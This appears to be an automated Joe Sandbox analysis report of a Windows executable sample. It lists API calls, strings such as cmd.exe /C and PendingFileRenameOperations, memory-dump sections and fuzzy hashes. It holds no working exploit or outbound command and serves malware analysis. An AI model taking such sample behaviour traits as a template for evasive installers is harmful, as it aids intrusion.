                                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                              • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                                              • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
                                                                                            • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                            • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
                                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                            • String ID: c:\directory$shell32.dll$%H
                                                                                            • API String ID: 3376378930-166502273
                                                                                            • Opcode ID: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                            • Instruction ID: 732e1a1751fb8a235258c93266195bfa595ebd68417bad8a6af0601d960a2915
                                                                                            • Opcode Fuzzy Hash: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                            • Instruction Fuzzy Hash: 8A516070604244AFD710DF65CD8AFDFB7A8EB48308F1081A6F80897351D6789E81DA59
                                                                                            APIs
                                                                                            • GetActiveWindow.USER32 ref: 0042F58F
                                                                                            • GetFocus.USER32 ref: 0042F597
                                                                                            • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                                                            • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                                                            • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                            • String ID: TWindowDisabler-Window
                                                                                            • API String ID: 3167913817-1824977358
                                                                                            • Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                            • Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
                                                                                            • Opcode Fuzzy Hash: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                            • Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                            • API String ID: 1646373207-2130885113
                                                                                            • Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                            • Instruction ID: a781b9bdaab79611976bfea65fa4e072d6e85bd62b4b6e26dfe65079d72397a7
                                                                                            • Opcode Fuzzy Hash: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                            • Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
                                                                                            APIs
                                                                                            • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
                                                                                            • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00430971
                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                            • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                            • API String ID: 4130936913-2943970505
                                                                                            • Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                            • Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
                                                                                            • Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                            • Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
                                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
                                                                                              • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                              • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                              • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                              • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                            • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                            • API String ID: 854858120-615399546
                                                                                            • Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                            • Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
                                                                                            • Opcode Fuzzy Hash: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                            • Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
                                                                                            APIs
                                                                                            • LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                            • OemToCharA.USER32(?,?), ref: 0042375C
                                                                                            • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$FileIconLoadLowerModuleName
                                                                                            • String ID: 2$MAINICON
                                                                                            • API String ID: 3935243913-3181700818
                                                                                            • Opcode ID: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                                                            • Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
                                                                                            • Opcode Fuzzy Hash: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                                                            • Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 00495519
                                                                                              • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0049553B
                                                                                            • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
                                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 00495571
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0049558E
                                                                                            Strings
                                                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                            • API String ID: 2948443157-222967699
                                                                                            • Opcode ID: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                            • Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
                                                                                            • Opcode Fuzzy Hash: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                            • Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
                                                                                            APIs
                                                                                            • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00418F79
                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
                                                                                              • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
                                                                                              • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                              • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                              • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                              • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                              • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                              • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
                                                                                              • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                              • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                              • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                              • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                              • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                                            • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                            • API String ID: 316262546-2767913252
                                                                                            • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                            • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                                                            • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                            • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                                            APIs
                                                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                            • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongWindow$Prop
                                                                                            • String ID:
                                                                                            • API String ID: 3887896539-0
                                                                                            • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                            • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                                                            • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                            • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                                                            Strings
                                                                                            • WININIT.INI, xrefs: 004557E4
                                                                                            • PendingFileRenameOperations2, xrefs: 00455784
                                                                                            • PendingFileRenameOperations, xrefs: 00455754
                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                            • API String ID: 47109696-2199428270
                                                                                            • Opcode ID: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                            • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                                                            • Opcode Fuzzy Hash: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                            • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                            • API String ID: 1375471231-2952887711
                                                                                            • Opcode ID: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                            • Instruction ID: e6577b7b61f0e0a35e690824fc442bae28cfcbc8f9cba78cd8161ab2dbd6b5d1
                                                                                            • Opcode Fuzzy Hash: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                            • Instruction Fuzzy Hash: E6412834A001099BDB11EFA5D882ADEB7B5EF45309F50843BE81577392DA38AE05CF68
                                                                                            APIs
                                                                                            • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                            • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                            • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$EnumLongWindows
                                                                                            • String ID: \AB
                                                                                            • API String ID: 4191631535-3948367934
                                                                                            • Opcode ID: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                            • Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
                                                                                            • Opcode Fuzzy Hash: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                            • Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
